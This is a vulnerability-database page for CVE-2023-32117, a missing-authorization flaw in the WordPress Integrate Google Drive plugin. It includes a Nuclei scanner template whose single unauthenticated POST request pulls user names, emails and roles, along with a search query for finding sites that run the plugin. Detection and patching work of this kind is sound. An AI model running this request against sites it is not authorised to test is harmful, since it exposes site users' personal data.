Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-32117
HistoryJul 30, 2023 - 3:12 p.m.

Integrate Google Drive <= 1.1.99 - Missing Authorization via REST API Endpoints

2023-07-3015:12:56
ProjectDiscovery
github.com
3
cve
wordpress
wpscan
wp-plugin
integrate-google-drive
unauthorized-access
sensitive-data
google-drive

6.4 Medium

AI Score

Confidence

High

0 Low

EPSS

Percentile

0.0%

The Integrate Google Drive plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several REST API endpoints in versions up to, and including, 1.1.99. This makes it possible for unauthenticated attackers to perform a wide variety of operations, such as moving files, creating folders, copying details, and much more.
id: CVE-2023-32117

info:
  name: Integrate Google Drive <= 1.1.99 - Missing Authorization via REST API Endpoints
  author: DhiyaneshDK
  severity: high
  description: |
    The Integrate Google Drive plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several REST API endpoints in versions up to, and including, 1.1.99. This makes it possible for unauthenticated attackers to perform a wide variety of operations, such as moving files, creating folders, copying details, and much more.
  impact: |
    Unauthenticated attackers can access and manipulate sensitive data in Google Drive
  remediation: Fixed in 1.2.0
  reference:
    - https://github.com/RandomRobbieBF/CVE-2023-32117
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/integrate-google-drive/integrate-google-drive-1199-missing-authorization-via-rest-api-endpoints
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: CVE-2023-32117
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "/wp-content/plugins/integrate-google-drive/"
  tags: cve,cve2023,wordpress,wpscan,wp-plugin,wp,integrate-google-drive

http:
  - method: POST
    path:
      - "{{BaseURL}}/wp-json/igd/v1/get-users-data"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"username":'
          - '"name":'
          - '"email":'
          - '"role":'
        condition: and

      - type: word
        part: header
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 490a004630440220720cc9500eac10bd738c6689a1daa0de0eb4dc2a5c2f69d6dc28a5295eaf444302202d0f5786f6935f70b2633f6c4e75192c4ca7f04afc7ec34d4835dced5c34fbfe:922c64590222798bb761d5b6d8e72950

6.4 Medium

AI Score

Confidence

High

0 Low

EPSS

Percentile

0.0%

Related for NUCLEI:CVE-2023-32117